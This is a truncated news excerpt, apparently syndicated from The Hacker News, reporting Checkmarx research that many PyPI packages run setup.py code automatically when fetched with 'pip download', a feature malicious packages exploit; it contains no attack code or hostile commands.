In another finding that could expose developers to increased risk of a supply chain attack, it has emerged that nearly one-third of the packages in PyPI, the Python Package Index, trigger automatic code execution upon downloading them.
"A worrying feature in pip/PyPI allows code to automatically run when developers are merely downloading a package," Checkmarx researcher Yehuda Gelb said in a technical report published this week.
"Also, this feature is alarming due to the fact that a great deal of the malicious packages we are finding in the wild use this feature of code execution upon installation to achieve higher infection rates."
One of the ways by which packages can be installed for Python is by executing the "pip install" command, which, in turn, invokes a file called "setup.py" that comes bundled along with the module.
"setup.py," as the name implies, is a setup script that's used to specify metadata associated with the package, including its dependencies.
While threat actors have resorted to incorporating malicious code in the setup.py file, Checkmarx found that adversaries could achieve the same goals by running what's called a "pip download" command.
"pip download does the same resolution and downloading as pip install, but instead of installing the dependencies, it collects the downloaded distributions into the directory provided (defaulting to the current directory)," the documentation reads.
In other words, the command can be used to download a Python package...
Read Full Story: https://thehackernews.com/2022/09/warning-pypi-feature-executes-code.html
Your content is great. However, if any of the content contained herein violates any rights of yours, including those of copyright, please contact us immediately by e-mail at media[@]kissrpr.com.
